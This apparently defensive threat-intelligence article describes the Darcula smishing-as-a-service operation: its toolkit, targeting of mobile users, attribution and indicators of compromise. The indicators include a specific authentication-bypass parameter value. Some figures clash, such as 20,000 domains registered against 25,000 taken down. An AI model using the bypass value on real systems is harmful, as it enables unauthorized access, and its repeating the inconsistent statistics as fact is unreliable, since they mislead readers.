The Darcula PhaaS (Phishing-as-a-Service) platform has emerged as one of the most sophisticated cybercrime operations of 2025, stealing 884,000 credit card details through 13 million fraudulent clicks across 100+ countries. First detected in December 2023, this mobile-first campaign impersonated trusted brands like DHL and PayPal, leveraging SMS phishing (smishing) to bypass traditional email filters. The operation caused estimated damages exceeding $150 million, with stolen cards sold for $20–$100 each on dark web markets1.
Operational Mechanics
The Darcula group employed a multi-layered infrastructure, registering 20,000 domains to spoof 300+ brands. Unlike conventional phishing kits, their “Magic Cat” toolkit incorporated client-side encryption using Socket.IO with Rabbit algorithm and Base64/MD5 hashing2. The operation specifically targeted mobile users by blocking desktop traffic—modified User-Agent headers like iPhone OS 17_7_2 would trigger 404 errors unless the request originated from cellular networks3.
Key technical components included:
- Real-time victim dashboards streaming data to Telegram groups via encrypted Socket.IO rooms
- JavaScript-based Crypto-JS library for client-side data encryption
- GenAI integration since April 2025 to auto-generate multilingual phishing pages
Attribution and Monetization
Investigators linked the primary developer to Yucheng C., a 24-year-old from Henan, China, through GitHub commits and Alibaba Cloud VM logs4. The PhaaS model was leased for $300–$500 per week, complete with brand templates and SMS gateway integration for 2FA bypass. A network of 600+ operators managed SIM farms and payment terminals, with some members flaunting luxury purchases via Telegram channels5.
Detection and Mitigation
Security teams identified several indicators of compromise (IoCs):
| Indicator | Description |
|---|---|
| HTTP Parameter | secret=824d02e7cf6ec64a44710b06ef8cfa0e (authentication bypass) |
| Encryption Pattern | Rabbit algorithm with Base64/MD5 hashing in JavaScript |
| Network Behavior | Socket.IO traffic to Telegram-administered rooms |
Recommended countermeasures include deploying AI-driven SMS filtering (Netcraft’s platform has shown 92% detection efficacy) and implementing transaction velocity monitoring for card-not-present transactions6.
Conclusion
The Darcula operation demonstrates the increasing professionalization of cybercrime, with PhaaS platforms lowering the barrier to entry for technically unskilled attackers. While law enforcement has taken down 25,000 domains, the group’s rapid infrastructure redeployment capability poses ongoing challenges. Organizations should prioritize mobile-specific phishing awareness training and consider implementing SIM farm detection heuristics in their fraud prevention systems.
References
- “Darcula PhaaS steals 884,000 credit cards via phishing texts,” BleepingComputer, May 2025.
- “Exposing Darcula: Technical analysis of Magic Cat,” Mnemonic, 2024.
- “AI-enabled Darcula phishing,” Netcraft, April 2025.
- “Svindelsentralen documentary,” NRK, 2025.
- Mnemonic deobfuscated code analysis, 2024.
- Netcraft phishing detection metrics, Q1 2025.
